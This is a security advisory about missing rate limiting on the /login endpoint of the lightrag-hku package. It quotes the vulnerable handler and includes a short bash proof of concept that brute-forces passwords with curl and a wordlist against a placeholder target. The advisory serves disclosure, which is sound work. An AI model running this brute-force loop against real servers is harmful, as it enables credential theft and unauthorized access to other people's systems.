Vulnerability GHSA-frch-4w6v-q5xx

Critical
CRITICAL RISK
CVSS Score: 9.1
Score Range: 9.0–10.0
Critical severity vulnerabilities (CVSS 9.0–10.0). These represent the highest impact issues.
8 days ago
September 22, 2026 at 08:40 PM UTC
lightrag-hku: No Rate Limiting on /login Endpoint Allows Brute-Force Attacks
0.0.2 - 1.5.5rc1
0.0.2 - 1.5.5rc1

Summary

lightrag-hku: No Rate Limiting on /login Endpoint Allows Brute-Force Attacks

Details

Summary

The POST /login endpoint has no rate limiting, account lockout, or delay on failed attempts. An attacker can submit unlimited password guesses at full network speed.

Details

# lightrag/api/lightrag_server.py:2161
@app.post("/login")
async def login(form_data: OAuth2PasswordRequestForm = Depends()):
    if not auth_handler.verify_password(username, form_data.password):
        raise HTTPException(status_code=401, detail="Incorrect credentials")
    # No: rate limit / lockout / backoff / CAPTCHA / attempt counter

A search for slowapi, rate_limit, lockout, or throttle in lightrag/api/ returns zero results.

PoC

# Brute-force /login with a wordlist, no throttling
while IFS= read -r pass; do
  code=$(curl -s -o /dev/null -w "%{http_code}" \
    -X POST http://<TARGET>:9621/login \
    -d "username=admin&password=${pass}")
  [ "$code" = "200" ] && echo "[FOUND] $pass" && break
done < /usr/share/wordlists/rockyou.txt

Impact

Improper restriction of authentication attempts. Any network-reachable attacker can brute-force user passwords without restriction. Once credentials are recovered, the attacker gains full authenticated access to all documents, knowledge graph, and administrative operations.

Impacted packages

Timeline

Published
8 days ago
September 22, 2026 at 08:40 PM UTC
Fixed (1.5.5)
2 months ago
July 31, 2026 at 12:08 PM UTC
Last Modified
2 hours ago
October 01, 2026 at 05:56 PM UTC